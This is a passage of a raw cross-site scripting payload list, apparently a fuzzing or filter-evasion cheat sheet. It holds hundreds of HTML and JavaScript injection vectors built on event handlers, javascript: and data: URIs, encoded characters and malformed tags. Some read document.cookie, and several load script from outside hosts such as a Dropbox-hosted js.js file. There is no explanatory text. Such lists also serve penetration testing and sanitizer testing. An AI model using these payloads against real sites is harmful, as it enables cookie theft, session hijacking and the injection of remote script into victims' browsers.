ondragend="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x ondragenter="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x ondragleave="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x ondragover="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x ondragstart="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x ondrop="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onscroll="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x oncopy="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x oncut="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onpaste="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onabort="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x oncanplay="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x oncanplaythrough="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x oncuechange="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x ondurationchange="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onemptied="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onended="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onloadeddata="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onloadedmetadata="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onloadstart="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onpause="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onplay="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onplaying="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onprogress="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onratechange="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onseeked="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onseeking="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onstalled="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onsuspend="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x ontimeupdate="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onvolumechange="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onwaiting="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onshow="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x ontoggle="alert(String.fromCharCode(88,83,83))"> <META onpaonpageonpagonpageonpageshowshoweshowshowgeshow="alert(1)"; <IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> <INPUT TYPE="BUTTON" action="alert('XSS')"/> "><h1><IFRAME SRC="javascript:alert('XSS');"></IFRAME>">123</h1> "><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1> <IFRAME SRC="javascript:alert('XSS');"></IFRAME> <IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME> "><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1> "></iframe><script>alert(`TEXT YOU WANT TO BE DISPLAYED`);</script><iframe frameborder="0%EF%BB%BF "><h1><IFRAME width="420" height="315" SRC="http://www.youtube.com/embed/sxvccpasgTE" frameborder="0" onmouseover="alert(document.cookie)"></IFRAME>123</h1> "><h1><iframe width="420" height="315" src="http://www.youtube.com/embed/sxvccpasgTE" frameborder="0" allowfullscreen></iframe>123</h1> ><h1><IFRAME width="420" height="315" frameborder="0" onmouseover="document.location.href='https://www.youtube.com/channel/UC9Qa_gXarSmObPX3ooIQZr g'"></IFRAME>Hover the cursor to the LEFT of this Message</h1>&ParamHeight=250 <IFRAME width="420" height="315" frameborder="0" onload="alert(document.cookie)"></IFRAME> "><h1><IFRAME SRC="javascript:alert('XSS');"></IFRAME>">123</h1> "><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1> <iframe src=http://xss.rocks/scriptlet.html < <IFRAME SRC="javascript:alert('XSS');"></IFRAME> <IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME> <iframe  src="&Tab;javascript:prompt(1)&Tab;"> <svg><style>{font-family&colon;'<iframe/onload=confirm(1)>' <input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;" <sVg><scRipt >alert&lpar;1&rpar; {Opera} <img/src=`` onerror=this.onerror=confirm(1) <form><isindex formaction="javascript&colon;confirm(1)" <img src=``&NewLine; onerror=alert(1)&NewLine; <script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script> <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=? <iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="> <script /**/>/**/alert(1)/**/</script /**/ "><h1/onmouseover='\u0061lert(1)'> <iframe/src="data:text/html,<svg onload=alert(1)>"> <meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/> <svg><script xlink:href=data&colon;,window.open('https://www.google.com/') </script <svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera} <meta http-equiv="refresh" content="0;url=javascript:confirm(1)"> <iframe src=javascript&colon;alert&lpar;document&period;location&rpar;> <form><a href="javascript:\u0061lert(1)">X</script><img/*/src="worksinchrome&colon;prompt(1)"/*/onerror='eval(src)'> <img/ &#11; src=`~` onerror=prompt(1)> <form><iframe &#11; src="javascript:alert(1)"&#11; ;> <a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==" &#11;>X</a http://www.google<script .com>alert(document.location)</script <a href=[&#00;]"&#00; onmouseover=prompt(1)//">XYZ</a <img/src=@ onerror = prompt('1') <style/onload=prompt('XSS') <script ^__^>alert(String.fromCharCode(49))</script ^__^ </style ><script :-(>/**/alert(document.location)/**/</script :-( &#00;</form><input type="date" onfocus="alert(1)"> <form><textarea onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'> <script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/ <iframe srcdoc='<body onload=prompt&lpar;1&rpar;>'> <a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a> <script ~~~>alert(0%0)</script ~~~> <style/onload=<!-- >alert&lpar;1&rpar;> <///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1) "><svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>' <blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera} <marquee onstart='javascript:alert(1)'>^__^ <div/style="width:expression(confirm(1))">X</div> {IE7} <iframe// src=javaSCRIPT&colon;alert(1) //<form/action=javascript:alert&lpar;document&period;cookie&rpar;><input/type='submit'>// /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/> //|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\ </font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style> <a/href="javascript: javascript:prompt(1)"><input type="X"> </plaintext\></|\><plaintext/onmouseover=prompt(1) </svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1) {Opera} <a href="javascript&colon;\u0061l&#101%72t&lpar;1&rpar;"><button> <div onmouseover='alert&lpar;1&rpar;'>DIV</div> <iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)"> <a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a> <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> <var onmouseover="prompt(1)">On Mouse Over</var> <a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a> <img src="/" =_=" title="onerror='prompt(1)'"> <%<!--'%><script>alert(1);</script --> <script src="data:text/javascript,alert(1)"></script> <iframe/src \/\/onload = prompt(1) <iframe/onreadystatechange=alert(1) <svg/onload=alert(1) <input value=<><iframe/src=javascript:confirm(1) <input type="text" value=`` <div/onmouseover='alert(1)'>X</div> http://www.<script>alert(1)</script .com <iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe> <svg><script ?>alert(1) <iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe> <img src=`xx:xx`onerror=alert(1)> <object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object> <meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/> <math><a xlink:href="//jsfiddle.net/t846h/">click <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always> <svg contentScriptType=text/vbs><script>MsgBox+1 <a href="data:text/html;base64_,<svg/onload=\u0061l&#101%72t(1)>">X</a <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE> <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+ <script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F <script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script <object data=javascript&colon;\u0061l&#101%72t(1)> <script>+-+-1-+-+alert(1)</script> <body/onload=<!-->&#10alert(1)> <script itworksinallbrowsers>/*<script* */alert(1)</script <img src ?itworksonchrome?\/onerror = alert(1) <svg><script>//&NewLine;confirm(1);</script </svg> <svg><script onlypossibleinopera:-)> alert(1) <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script:&#97lert(1)>ClickMe <script x> alert(1) </script 1=2 <div/onmouseover='alert(1)'> style="x:"> <--`<img/src=` onerror=alert(1)> --!> <script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,alert(1)></script> <div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button> "><img src=x onerror=window.open('https://www.google.com/');> <form><button formaction=javascript&colon;alert(1)>CLICKME <math><a xlink:href="//jsfiddle.net/t846h/">click <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object> <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe> <a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a> <script\x20type="text/javascript">javascript:alert(1);</script> <script\x3Etype="text/javascript">javascript:alert(1);</script> <script\x0Dtype="text/javascript">javascript:alert(1);</script> <script\x09type="text/javascript">javascript:alert(1);</script> <script\x0Ctype="text/javascript">javascript:alert(1);</script> <script\x2Ftype="text/javascript">javascript:alert(1);</script> <script\x0Atype="text/javascript">javascript:alert(1);</script> '`"><\x3Cscript>javascript:alert(1)</script>         '`"><\x00script>javascript:alert(1)</script> <img src=1 href=1 onerror="javascript:alert(1)"></img> <audio src=1 href=1 onerror="javascript:alert(1)"></audio> <video src=1 href=1 onerror="javascript:alert(1)"></video> <body src=1 href=1 onerror="javascript:alert(1)"></body> <image src=1 href=1 onerror="javascript:alert(1)"></image> <object src=1 href=1 onerror="javascript:alert(1)"></object> <script src=1 href=1 onerror="javascript:alert(1)"></script> <svg onResize svg onResize="javascript:javascript:alert(1)"></svg onResize> <title onPropertyChange title onPropertyChange="javascript:javascript:alert(1)"></title onPropertyChange> <iframe onLoad iframe onLoad="javascript:javascript:alert(1)"></iframe onLoad> <body onMouseEnter body onMouseEnter="javascript:javascript:alert(1)"></body onMouseEnter> <body onFocus body onFocus="javascript:javascript:alert(1)"></body onFocus> <frameset onScroll frameset onScroll="javascript:javascript:alert(1)"></frameset onScroll> <script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(1)"></script onReadyStateChange> <html onMouseUp html onMouseUp="javascript:javascript:alert(1)"></html onMouseUp> <body onPropertyChange body onPropertyChange="javascript:javascript:alert(1)"></body onPropertyChange> <svg onLoad svg onLoad="javascript:javascript:alert(1)"></svg onLoad> <body onPageHide body onPageHide="javascript:javascript:alert(1)"></body onPageHide> <body onMouseOver body onMouseOver="javascript:javascript:alert(1)"></body onMouseOver> <body onUnload body onUnload="javascript:javascript:alert(1)"></body onUnload> <body onLoad body onLoad="javascript:javascript:alert(1)"></body onLoad> <bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(1)"></bgsound onPropertyChange> <html onMouseLeave html onMouseLeave="javascript:javascript:alert(1)"></html onMouseLeave> <html onMouseWheel html onMouseWheel="javascript:javascript:alert(1)"></html onMouseWheel> <style onLoad style onLoad="javascript:javascript:alert(1)"></style onLoad> <iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(1)"></iframe onReadyStateChange> <body onPageShow body onPageShow="javascript:javascript:alert(1)"></body onPageShow> <style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(1)"></style onReadyStateChange> <frameset onFocus frameset onFocus="javascript:javascript:alert(1)"></frameset onFocus> <applet onError applet onError="javascript:javascript:alert(1)"></applet onError> <marquee onStart marquee onStart="javascript:javascript:alert(1)"></marquee onStart> <script onLoad script onLoad="javascript:javascript:alert(1)"></script onLoad> <html onMouseOver html onMouseOver="javascript:javascript:alert(1)"></html onMouseOver> <html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(1)"></html onMouseEnter> <body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(1)"></body onBeforeUnload> <html onMouseDown html onMouseDown="javascript:javascript:alert(1)"></html onMouseDown> <marquee onScroll marquee onScroll="javascript:javascript:alert(1)"></marquee onScroll> <xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(1)"></xml onPropertyChange> <frameset onBlur frameset onBlur="javascript:javascript:alert(1)"></frameset onBlur> <applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(1)"></applet onReadyStateChange> <svg onUnload svg onUnload="javascript:javascript:alert(1)"></svg onUnload> <html onMouseOut html onMouseOut="javascript:javascript:alert(1)"></html onMouseOut> <body onMouseMove body onMouseMove="javascript:javascript:alert(1)"></body onMouseMove> <body onResize body onResize="javascript:javascript:alert(1)"></body onResize> <object onError object onError="javascript:javascript:alert(1)"></object onError> <body onPopState body onPopState="javascript:javascript:alert(1)"></body onPopState> <html onMouseMove html onMouseMove="javascript:javascript:alert(1)"></html onMouseMove> <applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(1)"></applet onreadystatechange> <body onpagehide body onpagehide="javascript:javascript:alert(1)"></body onpagehide> <svg onunload svg onunload="javascript:javascript:alert(1)"></svg onunload> <applet onerror applet onerror="javascript:javascript:alert(1)"></applet onerror> <body onkeyup body onkeyup="javascript:javascript:alert(1)"></body onkeyup> <body onunload body onunload="javascript:javascript:alert(1)"></body onunload> <iframe onload iframe onload="javascript:javascript:alert(1)"></iframe onload> <body onload body onload="javascript:javascript:alert(1)"></body onload> <html onmouseover html onmouseover="javascript:javascript:alert(1)"></html onmouseover> <object onbeforeload object onbeforeload="javascript:javascript:alert(1)"></object onbeforeload> <body onbeforeunload body onbeforeunload="javascript:javascript:alert(1)"></body onbeforeunload> <body onfocus body onfocus="javascript:javascript:alert(1)"></body onfocus> <body onkeydown body onkeydown="javascript:javascript:alert(1)"></body onkeydown> <iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(1)"></iframe onbeforeload> <iframe src iframe src="javascript:javascript:alert(1)"></iframe src> <svg onload svg onload="javascript:javascript:alert(1)"></svg onload> <html onmousemove html onmousemove="javascript:javascript:alert(1)"></html onmousemove> <body onblur body onblur="javascript:javascript:alert(1)"></body onblur> \x3Cscript>javascript:alert(1)</script> '"`><script>/* *\x2Fjavascript:alert(1)// */</script> <script>javascript:alert(1)</script\x0D <script>javascript:alert(1)</script\x0A <script>javascript:alert(1)</script\x0B <script charset="\x22>javascript:alert(1)</script> <!--\x3E<img src=xxx:x onerror=javascript:alert(1)> --> --><!-- ---> <img src=xxx:x onerror=javascript:alert(1)> --> --><!-- --\x00> <img src=xxx:x onerror=javascript:alert(1)> --> --><!-- --\x21> <img src=xxx:x onerror=javascript:alert(1)> --> --><!-- --\x3E> <img src=xxx:x onerror=javascript:alert(1)> --> `"'><img src='#\x27 onerror=javascript:alert(1)> <a href="javascript\x3Ajavascript:alert(1)" id="fuzzelement1">test</a> "'`><p><svg><script>a='hello\x27;javascript:alert(1)//';</script></p> <a href="javas\x00cript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x07cript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x0Dcript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x0Acript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x08cript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x02cript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x03cript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x04cript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x01cript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x05cript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x0Bcript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x09cript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x06cript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x0Ccript:javascript:alert(1)" id="fuzzelement1">test</a> <script>/* *\x2A/javascript:alert(1)// */</script> <script>/* *\x00/javascript:alert(1)// */</script> <style></style\x3E<img src="about:blank" onerror=javascript:alert(1)//></style> <style></style\x0D<img src="about:blank" onerror=javascript:alert(1)//></style> <style></style\x09<img src="about:blank" onerror=javascript:alert(1)//></style> <style></style\x20<img src="about:blank" onerror=javascript:alert(1)//></style> <style></style\x0A<img src="about:blank" onerror=javascript:alert(1)//></style> "'`>ABC<div style="font-family:'foo'\x7Dx:expression(javascript:alert(1);/*';">DEF "'`>ABC<div style="font-family:'foo'\x3Bx:expression(javascript:alert(1);/*';">DEF <script>if("x\\xE1\x96\x89".length==2) { javascript:alert(1);}</script> <script>if("x\\xE0\xB9\x92".length==2) { javascript:alert(1);}</script> <script>if("x\\xEE\xA9\x93".length==2) { javascript:alert(1);}</script> '`"><\x3Cscript>javascript:alert(1)</script> '`"><\x00script>javascript:alert(1)</script> "'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)> "'`><\x00img src=xxx:x onerror=javascript:alert(1)> <script src="data:text/plain\x2Cjavascript:alert(1)"></script> <script src="data:\xD4\x8F,javascript:alert(1)"></script> <script src="data:\xE0\xA4\x98,javascript:alert(1)"></script> <script src="data:\xCB\x8F,javascript:alert(1)"></script> <script\x20type="text/javascript">javascript:alert(1);</script> <script\x3Etype="text/javascript">javascript:alert(1);</script> <script\x0Dtype="text/javascript">javascript:alert(1);</script> <script\x09type="text/javascript">javascript:alert(1);</script> <script\x0Ctype="text/javascript">javascript:alert(1);</script> <script\x2Ftype="text/javascript">javascript:alert(1);</script> <script\x0Atype="text/javascript">javascript:alert(1);</script> ABC<div style="x\x3Aexpression(javascript:alert(1)">DEF ABC<div style="x:expression\x5C(javascript:alert(1)">DEF ABC<div style="x:expression\x00(javascript:alert(1)">DEF ABC<div style="x:exp\x00ression(javascript:alert(1)">DEF ABC<div style="x:exp\x5Cression(javascript:alert(1)">DEF ABC<div style="x:\x0Aexpression(javascript:alert(1)">DEF ABC<div style="x:\x09expression(javascript:alert(1)">DEF ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x84expression(javascript:alert(1)">DEF ABC<div style="x:\xC2\xA0expression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x80expression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(1)">DEF ABC<div style="x:\x0Dexpression(javascript:alert(1)">DEF ABC<div style="x:\x0Cexpression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x87expression(javascript:alert(1)">DEF ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(1)">DEF ABC<div style="x:\x20expression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x88expression(javascript:alert(1)">DEF ABC<div style="x:\x00expression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x86expression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x85expression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x82expression(javascript:alert(1)">DEF ABC<div style="x:\x0Bexpression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x81expression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x83expression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x89expression(javascript:alert(1)">DEF <a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x0Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xC2\xA0javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x05javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE1\xA0\x8Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x18javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x11javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\x88javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\x89javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x17javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x03javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x0Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x00javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x10javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\x82javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x20javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\x8Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x14javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x19javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\xAFjavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x1Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\x81javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\x87javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x07javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE1\x9A\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\x83javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x04javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x08javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\x84javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\x86javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE3\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x12javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x0Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x0Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x0Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x15javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\xA8javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x16javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x02javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x1Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x06javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\xA9javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\x85javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x1Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x81\x9Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x1Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javascript\x00:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javascript\x3A:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javascript\x09:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javascript\x0D:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javascript\x0A:javascript:alert(1)" id="fuzzelement1">test</a> `"'><img src=xxx:x \x0Aonerror=javascript:alert(1)> `"'><img src=xxx:x \x22onerror=javascript:alert(1)> `"'><img src=xxx:x \x0Bonerror=javascript:alert(1)> `"'><img src=xxx:x \x0Donerror=javascript:alert(1)> `"'><img src=xxx:x \x2Fonerror=javascript:alert(1)> `"'><img src=xxx:x \x09onerror=javascript:alert(1)> `"'><img src=xxx:x \x0Conerror=javascript:alert(1)> `"'><img src=xxx:x \x00onerror=javascript:alert(1)> `"'><img src=xxx:x \x27onerror=javascript:alert(1)> `"'><img src=xxx:x \x20onerror=javascript:alert(1)> "`'><script>\x3Bjavascript:alert(1)</script> "`'><script>\x0Djavascript:alert(1)</script> "`'><script>\xEF\xBB\xBFjavascript:alert(1)</script> "`'><script>\xE2\x80\x81javascript:alert(1)</script> "`'><script>\xE2\x80\x84javascript:alert(1)</script> "`'><script>\xE3\x80\x80javascript:alert(1)</script> "`'><script>\x09javascript:alert(1)</script> "`'><script>\xE2\x80\x89javascript:alert(1)</script> "`'><script>\xE2\x80\x85javascript:alert(1)</script> "`'><script>\xE2\x80\x88javascript:alert(1)</script> "`'><script>\x00javascript:alert(1)</script> "`'><script>\xE2\x80\xA8javascript:alert(1)</script> "`'><script>\xE2\x80\x8Ajavascript:alert(1)</script> "`'><script>\xE1\x9A\x80javascript:alert(1)</script> "`'><script>\x0Cjavascript:alert(1)</script> "`'><script>\x2Bjavascript:alert(1)</script> "`'><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script> "`'><script>-javascript:alert(1)</script> "`'><script>\x0Ajavascript:alert(1)</script> "`'><script>\xE2\x80\xAFjavascript:alert(1)</script> "`'><script>\x7Ejavascript:alert(1)</script> "`'><script>\xE2\x80\x87javascript:alert(1)</script> "`'><script>\xE2\x81\x9Fjavascript:alert(1)</script> "`'><script>\xE2\x80\xA9javascript:alert(1)</script> "`'><script>\xC2\x85javascript:alert(1)</script> "`'><script>\xEF\xBF\xAEjavascript:alert(1)</script> "`'><script>\xE2\x80\x83javascript:alert(1)</script> "`'><script>\xE2\x80\x8Bjavascript:alert(1)</script> "`'><script>\xEF\xBF\xBEjavascript:alert(1)</script> 